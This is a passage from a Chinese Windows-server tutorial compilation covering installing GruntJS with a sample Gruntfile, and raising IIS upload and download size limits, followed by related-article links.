-c 最大同时连接数,默认是1024
-f 块大小增长因子,默认是1.25
-n 最小分配空间,key+value+flags默认是48
-h 显示帮助
篇14:Windows服务器中安装 GruntJS方法介绍Windows服务器操作系统
本文章来给大家介绍Windows服务器中安装 GruntJS方法,但我们必须注意的是安装 Grunt.js 之前你需要先安装 Node.js,对于本教程而言,我已经安装好了 node.js v0.10.0了,希望此文章对各位有所帮助。
我将要安装 Grunt.js v0.4.1。警告:如果你已经安装了 Grunt.js 0.3.x 或者更低的版本,请先卸载它。
Grunt 的命令行界面
为了安装 grunt.js,我们需要要安装好全局的 Grunt 命令行界面(CLI),当前的 CLI 版本是 1.0.6。打开 Windows 命令窗口(CMD)并输入以下指令:
代码如下复制代码npm install grunt-cli -g这条指令会把 grunt 添加到你的系统环境变量,然后你就可以在任何目录运行 grunt 了。
Windows 小技巧 —— 在文件夹中打开命令提示符
1. 在地址栏里输入“CMD”并回车
2. 按住 Shift 键然后在文件夹空白处右键鼠标,选择“在此处打开命令窗口”
建立文件夹和 package.json
现在我们需要安装 Grunt.js 了。在命令提示符中进入项目文件夹,我喜欢把编译文件放在一个名叫 _build 的文件夹中,因此,这个例子的路径是“C:/Users/codebelt/Desktop/first-grunt-project/_build”。
有好几种安装 Grunt.js 和插件的方法,但是我会分享其中我认为最简单的一种方法。我们需要先新建一个 package.json 的文件,把它放到 _build 文件夹中,复制并粘贴以下代码到 package.json 中。
代码如下复制代码{
”name“: ”Test-Project“,
”version“: ”0.1.0“,
”devDependencies“: {
”grunt“: ”~0.4.1“,
”grunt-contrib-concat“: ”~0.1.3“
}
}
当下面的代码被运行后,grunt v0.4.1 和 grunt 插件 concat v0.1.3 就被安装进了 _build 文件夹。
命令如下:
npm install建立 Grunt 文件
现在 Grunt.js 和 Concat 插件应该已经安装好了。现在我们需要新增一个 Grunt 文件来配置和编译我们的项目。新建一个 Gruntfile.js 文件到 _build 文件夹下,然后粘贴以下代码到 Gruntfile.js。
代码如下复制代码module.exports = function(grunt) {
// Project configuration.
grunt.initConfig({
//Read the package.json (optional)
pkg: grunt.file.readJSON('package.json'),
// Metadata.
meta. {
basePath: '../',
srcPath: '../src/',
deployPath: '../deploy/'
},
banner: '/*! <%= pkg.name %>- v<%= pkg.version %>- ' +
'<%= grunt.template.today(”yyyy-mm-dd“) %>/n' +
'* Copyright (c) <%= grunt.template.today(”yyyy“) %>',
// Task configuration.
concat: {
options: {
stripBanners: true
},
dist: {
src: ['<%= meta.srcPath %>scripts/fileone.js', '<%= meta.srcPath %>scripts/filetwo.js'],
dest: '<%= meta.deployPath %>scripts/app.js'
}
}
});
// These plugins provide necessary tasks.
grunt.loadNpmTasks('grunt-contrib-concat');
// Default task
grunt.registerTask('default', ['concat']);
};
如果你有看以上代码内容,你可以发现我在 ../src/scripts 目录下新建了 fileone.js 和 filetwo.js 两个文件,
这个 GruntJS 脚本会把这两个文件合并导出到 ../deploy/scripts 文件夹下的 app.js。我用 作为常量或基础路径来定义我的文件夹路径。这样我就可以只在一个地方修改基础路径,而不用在 Gruntfile 中修改所有的路径了。
现在,在命令提示符中输入 grunt,接下来就是见证奇迹的时刻。
grunt它会运行 Default 任务,也就是合并两个 js 文件到一个文件中。试试吧,希望这对你有用。你应该可以看到命令提示符中输出:
代码如下复制代码Running ”concat:dist“ (concat) taskFile ”../deploy/scripts/app.js\" created.
Done, without errors.
######### 翻译完成的分割线 #########
Grunt 是个好东西,搞前端开发的同学都有必要学会使用这样的工具来方便管理自己的开发。
篇15:windows服务器中iis限制文件大小方法Windows服务器操作系统
本文章来介绍一下在windows服务器中如何来利用iis限制各个上传文件的大小问题,有需要的同学可以参考一下,
一、上传文件大小限制修改:
1 、运行iisreset –stop,关闭 iis admin service 服务。
2、找到 windowssystem32inesrv 下的 metabase.xml 文件。
3、用纯文本方式打开,找到 ASPMaxRequestEntityAllowed 把它修改为需要的值(比如10M即:10240000),默认为:204800,即:200K。
4 、存盘,然后运行iisreset重启 iis admin service 服务。
二、下载文件大小限制修改:
1、运行iisreset –stop,关闭 iis admin service 服务。
2、找到 windowssystem32inesrv 下的 metabase.xml 文件,
3、用纯文本方式打开,找到 AspBufferingLimit 把它修改为需要的值(比如20M即:20480000),默认为4M。
4、存盘,然后运行iisreset重启 iis admin service 服务。
win2008+IIS7:
打开IIS管理器
双击“IIS”中的“ASP”
打开“配置 ASP 应该程序的属性”
展开“限制属性”;
修改“最大请求实体主体限制”的值,默认值为200000(即不到200KB);
把它修改为你想修改的大小,如:52000000(50MB)。
修改完成点击“应用”
- 节省windows 7系统硬盘空间的妙招2022-12-11
- 如何诊断和调试Windows系统蓝屏2022-12-11
- 让Windows XP系统更安全的超级必杀技2023-02-01
- javascript模拟Windows系统下的扫雷游戏2023-03-21
- 手把手教你如何使Windows系统更安全2023-06-10
- 看我如何解决蓝屏故障Windows系统2022-12-18
- windows系统怎么修改hosts文件的权限?2022-12-20
- 恢复Windows Me系统中丢失的文件Windows系统2025-08-29
- SA239考前最后一次简要总结(19章)Windows系统2022-12-15
- Windows云主机数据盘分区和格式化WEB服务器2022-12-28
- 1go语言执行windows下命令行的方法
- 2各位前辈,小女子是400初学之初学Windows系统
- 3UNIX多用户系统下信号量操作详解Windows系统
- 4windows xp如何在Windows xp系统中批量改名方法总结电脑新手办公/数码
- 5如何将终端屏幕内容写到文件中Windows系统
- 6请问WRKSYSSTS中的两个数据是什么意思Windows系统
- 7SCO UNIX学习宝典(基本配置及操作)Windows系统
- 8Windows系统电脑设置在局域网文件共享的方法(1/2)电脑新手办公/数码
- 9Windows 8系统电脑桌面图标不见了怎么办电脑新手办公/数码
- 10windows 7系统怎么修改计算机的名字电脑新手办公/数码